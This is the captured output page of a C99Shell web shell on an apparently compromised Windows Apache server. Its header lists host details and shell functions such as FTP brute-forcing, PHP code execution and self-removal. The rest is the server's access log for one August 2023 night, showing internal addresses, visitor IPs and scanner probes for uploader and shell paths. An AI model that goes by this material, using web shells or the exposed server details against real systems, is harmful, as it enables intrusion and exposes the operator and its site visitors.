!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.08.14.log (3.03 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
68.183.85.57 - - [14/Aug/2023:00:00:18 -0500] "\x16\x03\x01" 400 226
68.183.85.57 - - [14/Aug/2023:00:00:19 -0500] "GET / HTTP/1.1" 200 319
68.183.85.57 - - [14/Aug/2023:00:00:19 -0500] "GET /client/get_targets HTTP/1.1" 404 1018
68.183.85.57 - - [14/Aug/2023:00:00:20 -0500] "GET /upl.php HTTP/1.1" 404 1018
68.183.85.57 - - [14/Aug/2023:00:00:21 -0500] "\x16\x03\x01" 400 226
68.183.85.57 - - [14/Aug/2023:00:00:21 -0500] "GET /geoip/ HTTP/1.1" 404 1018
68.183.85.57 - - [14/Aug/2023:00:00:22 -0500] "GET / HTTP/1.1" 200 319
68.183.85.57 - - [14/Aug/2023:00:00:23 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
68.183.85.57 - - [14/Aug/2023:00:00:24 -0500] "GET /1.php HTTP/1.1" 404 1018
68.183.85.57 - - [14/Aug/2023:00:00:24 -0500] "GET /bundle.js HTTP/1.1" 404 1018
68.183.85.57 - - [14/Aug/2023:00:00:25 -0500] "GET /files/ HTTP/1.1" 404 1018
68.183.85.57 - - [14/Aug/2023:00:00:26 -0500] "GET /systembc/password.php HTTP/1.1" 404 1018
201.245.192.253 - - [14/Aug/2023:00:02:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:00:03:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:03:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/Aug/2023:00:02:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:03:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53362
201.245.192.253 - - [14/Aug/2023:00:07:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:00:08:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:08:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:09:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [14/Aug/2023:00:12:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:00:13:15 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.7 - - [14/Aug/2023:00:14:06 -0500] "GET /movilidad-sostenible-para-mitigar-el-cambio-climatico.html HTTP/1.1" 200 768
152.61.192.232 - - [14/Aug/2023:00:14:07 -0500] "GET / HTTP/1.1" 200 319
69.63.189.1 - - [14/Aug/2023:00:14:09 -0500] "GET /movilidad-sostenible-para-mitigar-el-cambio-climatico.html HTTP/1.1" 200 768
172.22.2.4 - - [14/Aug/2023:00:14:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49695
172.22.2.4 - - [14/Aug/2023:00:14:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.153 - - [14/Aug/2023:00:16:24 -0500] "GET /BLA/resoluciones/AUTOS%202022/2025.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:00:14:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48660
172.22.2.4 - - [14/Aug/2023:00:15:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
34.224.22.179 - - [14/Aug/2023:00:17:11 -0500] "GET /mejora-tu-bienestar-con-las-caminatas-ecologicas-%C3%82%C2%A1conoce-la-programacion-de-agosto.html HTTP/1.1" 200 873
201.245.192.253 - - [14/Aug/2023:00:17:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
34.224.22.179 - - [14/Aug/2023:00:17:50 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [14/Aug/2023:00:17:54 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [14/Aug/2023:00:18:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:00:18:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43679
201.245.192.253 - - [14/Aug/2023:00:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41406
172.22.2.4 - - [14/Aug/2023:00:19:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:00:22:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:00:20:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
173.252.87.2 - - [14/Aug/2023:00:22:42 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
216.245.221.92 - - [14/Aug/2023:00:23:15 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [14/Aug/2023:00:24:46 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Aug/2023:00:26:27 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/Aug/2023:00:26:28 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/Aug/2023:00:26:29 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/Aug/2023:00:27:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2022&resuelve= HTTP/1.1" 200 50260
172.22.2.4 - - [14/Aug/2023:00:27:04 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [14/Aug/2023:00:27:04 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:00:27:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:00:25:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:26:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61130
216.245.221.92 - - [14/Aug/2023:00:28:15 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.208 - - [14/Aug/2023:00:28:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/2056.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:00:28:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2021&resuelve= HTTP/1.1" 200 128051
201.245.192.253 - - [14/Aug/2023:00:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43679
201.245.192.253 - - [14/Aug/2023:00:28:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41406
190.146.176.124 - - [14/Aug/2023:00:29:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5479.pdf HTTP/1.1" 200 2315705
190.146.176.124 - - [14/Aug/2023:00:29:01 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.118.60.55 - - [14/Aug/2023:00:29:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 890362
200.118.60.55 - - [14/Aug/2023:00:30:29 -0500] "GET /BLA/resoluciones/AUTOS%202014/5845.pdf HTTP/1.1" 200 469877
201.245.192.253 - - [14/Aug/2023:00:32:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:00:31:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:00:33:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:33:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2017&resuelve= HTTP/1.1" 200 155856
190.146.176.124 - - [14/Aug/2023:00:33:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3428.pdf HTTP/1.1" 200 503603
172.22.2.4 - - [14/Aug/2023:00:32:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58981
201.245.192.253 - - [14/Aug/2023:00:37:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:00:38:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:00:38:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43679
201.245.192.253 - - [14/Aug/2023:00:38:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41406
172.22.2.4 - - [14/Aug/2023:00:37:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:38:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61130
201.245.192.253 - - [14/Aug/2023:00:42:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
152.61.192.232 - - [14/Aug/2023:00:42:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [14/Aug/2023:00:42:27 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [14/Aug/2023:00:42:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [14/Aug/2023:00:43:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.194 - - [14/Aug/2023:00:44:22 -0500] "GET /el-ejemplo-comienza-por-casa-alcaldia-de-bogota-expide-decreto-para-reducir-plasticos-de-un-solo-uso-en-las-entidades-del-distrito.html HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:00:43:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:43:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49695
172.22.2.4 - - [14/Aug/2023:00:44:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54150
201.245.192.253 - - [14/Aug/2023:00:47:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:00:48:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.192 - - [14/Aug/2023:00:50:22 -0500] "GET /este-jueves-muevete-sostenible-y-dale-un-respiro-a-la-ciudad-en-el-dia-sin-carro-y-sin-moto.html HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:00:49:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:49:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51319
201.245.192.253 - - [14/Aug/2023:00:52:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:00:50:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61130
216.245.221.92 - - [14/Aug/2023:00:53:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:00:54:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:00:57:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:00:55:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56970
216.245.221.92 - - [14/Aug/2023:00:58:15 -0500] "HEAD / HTTP/1.1" 200 -
190.156.164.156 - - [14/Aug/2023:00:58:36 -0500] "-" 408 -
186.30.4.78 - - [14/Aug/2023:00:59:42 -0500] "GET /bogota-empieza-la-consolidacion-de-la-estrategia-de-bosques-urbanos-con-el-brazo-salitre-en-barrios-unidos.html?utm_source=Youtube_DIGI&utm_medium=CPV&utm_campaign=BosquesUrbanos&utm_id=Agosto_2023&gclid=CjwKCAjw_uGmBhBREiwAeOfsdwON2lkEMRAyIYdq_WM-IgPgzyJ-YBepowkVgY-J_1rOagfTtpYOmRoCK1gQAvD_BwE HTTP/1.1" 200 892
186.30.4.78 - - [14/Aug/2023:00:59:42 -0500] "GET /robots.txt HTTP/1.1" 404 1136
201.245.192.253 - - [14/Aug/2023:01:02:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:01:00:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:01:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [14/Aug/2023:01:03:15 -0500] "HEAD / HTTP/1.1" 200 -
51.222.253.19 - - [14/Aug/2023:01:04:29 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [14/Aug/2023:01:06:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:01:06:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:01:08:15 -0500] "HEAD / HTTP/1.1" 200 -
200.118.60.55 - - [14/Aug/2023:01:08:33 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 407428
172.22.2.4 - - [14/Aug/2023:01:07:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
69.63.184.119 - - [14/Aug/2023:01:09:08 -0500] "GET /movilidad-sostenible-para-mitigar-el-cambio-climatico.html HTTP/1.1" 200 768
144.126.232.243 - - [14/Aug/2023:01:09:49 -0500] "GET / HTTP/1.1" 200 319
152.61.128.50 - - [14/Aug/2023:01:10:22 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [14/Aug/2023:01:10:23 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [14/Aug/2023:01:10:23 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [14/Aug/2023:01:11:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:01:13:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:12:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.127.118 - - [14/Aug/2023:01:14:42 -0500] "GET /movilidad-sostenible-para-mitigar-el-cambio-climatico.html HTTP/1.1" 200 768
172.22.2.4 - - [14/Aug/2023:01:13:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
201.245.192.253 - - [14/Aug/2023:01:16:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:01:18:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:01:18:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43838
201.245.192.253 - - [14/Aug/2023:01:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41414
95.108.213.246 - - [14/Aug/2023:01:19:11 -0500] "GET /robots.txt HTTP/1.1" 404 1018
95.108.213.200 - - [14/Aug/2023:01:19:12 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Aug/2023:01:18:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:19:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47863
201.245.192.253 - - [14/Aug/2023:01:21:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:01:23:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:23:16 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1038
40.77.167.247 - - [14/Aug/2023:01:24:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1903.pdf HTTP/1.1" 200 393260
172.22.2.4 - - [14/Aug/2023:01:24:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:24:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
201.245.192.253 - - [14/Aug/2023:01:26:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:01:28:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:28:16 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
201.245.192.253 - - [14/Aug/2023:01:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43838
201.245.192.253 - - [14/Aug/2023:01:28:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41414
52.167.144.78 - - [14/Aug/2023:01:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202016/1806.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:01:28:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62286
52.167.144.153 - - [14/Aug/2023:01:30:01 -0500] "GET /forest/ HTTP/1.1" 200 12041
31.148.130.225 - - [14/Aug/2023:01:31:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/1647.pdf HTTP/1.1" 200 454022
162.55.171.138 - - [14/Aug/2023:01:31:20 -0500] "GET / HTTP/1.1" 200 319
162.55.171.138 - - [14/Aug/2023:01:31:22 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [14/Aug/2023:01:29:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:01:31:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:01:30:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [14/Aug/2023:01:33:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:33:41 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
40.77.167.208 - - [14/Aug/2023:01:34:02 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
40.77.167.208 - - [14/Aug/2023:01:34:03 -0500] "GET /Publicaciones/2023EE118882.pdf HTTP/1.1" 404 228
172.22.2.4 - - [14/Aug/2023:01:33:42 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62795
201.245.192.253 - - [14/Aug/2023:01:36:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:01:35:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:36:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
216.245.221.92 - - [14/Aug/2023:01:38:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:01:38:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43838
201.245.192.253 - - [14/Aug/2023:01:38:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41414
201.245.192.253 - - [14/Aug/2023:01:41:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.160 - - [14/Aug/2023:01:42:44 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
172.22.2.4 - - [14/Aug/2023:01:41:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:01:43:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:42:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
200.118.60.55 - - [14/Aug/2023:01:44:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 331296
198.199.105.95 - - [14/Aug/2023:01:45:38 -0500] "MGLNDD_190.27.245.106_80" 501 953
201.245.192.253 - - [14/Aug/2023:01:46:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:01:48:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:47:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:48:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [14/Aug/2023:01:51:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.101 - - [14/Aug/2023:01:52:49 -0500] "GET /robots.txt HTTP/1.1" 404 1034
52.167.144.81 - - [14/Aug/2023:01:52:55 -0500] "GET /secretaria-de-ambiente-abre-inscripciones-para-recorridos-gratuitos-en-aulas-ambientales-de-bogota.html HTTP/1.1" 304 -
216.245.221.92 - - [14/Aug/2023:01:53:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:53:44 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [14/Aug/2023:01:53:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:54:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
201.245.192.253 - - [14/Aug/2023:01:56:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:01:58:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:59:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:01:59:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
201.245.192.253 - - [14/Aug/2023:02:01:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.127.16 - - [14/Aug/2023:02:01:50 -0500] "GET /images/pl\xc3\xa1sticos%20foto%201..jpg HTTP/1.1" 404 1034
52.167.144.81 - - [14/Aug/2023:02:02:04 -0500] "GET /con-aliados-estrategicos-mujeres-que-reverdecen-continua-brindando-nuevas-oportunidades.html HTTP/1.1" 200 900
162.55.175.143 - - [14/Aug/2023:02:02:33 -0500] "GET / HTTP/1.1" 200 319
162.55.175.143 - - [14/Aug/2023:02:02:35 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [14/Aug/2023:02:03:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.194 - - [14/Aug/2023:02:03:23 -0500] "GET /como-obtener-el-certificado-de-estado-de-conservacion-ambiental-ceca.html HTTP/1.1" 304 -
66.249.70.7 - - [14/Aug/2023:02:04:43 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/5132.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:02:04:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:02:06:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:02:05:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [14/Aug/2023:02:08:15 -0500] "HEAD / HTTP/1.1" 200 -
186.118.160.253 - - [14/Aug/2023:02:11:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.118.160.253 - - [14/Aug/2023:02:11:16 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
